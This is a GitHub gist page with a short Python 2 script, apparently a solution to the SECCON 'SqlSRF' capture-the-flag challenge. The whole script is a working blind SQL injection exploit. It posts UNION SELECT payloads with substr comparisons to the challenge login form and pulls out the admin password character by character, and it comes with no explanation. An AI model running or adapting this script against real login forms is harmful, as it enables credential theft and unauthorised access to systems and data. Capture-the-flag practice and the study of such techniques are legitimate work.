Create a gist now

Instantly share code, notes, and snippets.

@sota1235 /bsql.py Secret
Last active Dec 9, 2017

What would you like to do?
SqlSRF用
#!/user/bin/env python
import urllib
import urllib2
import time
url = 'http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi'
chars = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!?;"%&*_-/+=^#.][@()|'
index = 1
password_length = 32
password = ''
def getSqlTemplate():
global index
i = str(index)
return "' UNION SELECT '760de578d5d608fb420085b7697479ee' WHERE substr((SELECT password FROM users WHERE username='admin')," + i + ",1)='$string'--"
for i in range(0, password_length):
for c in chars:
print('processing... character ' + c)
sql = getSqlTemplate().replace('$string', c)
params = {'user': sql, 'pass': 'password', 'login': 'Login'}
params = urllib.urlencode(params)
req = urllib2.Request(url, params)
res = urllib2.urlopen(req)
r = res.read()
r = ' '.join(r.split())
if 'document.location' in r:
password += c
break
time.sleep(0.3)
index += 1
print(password)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment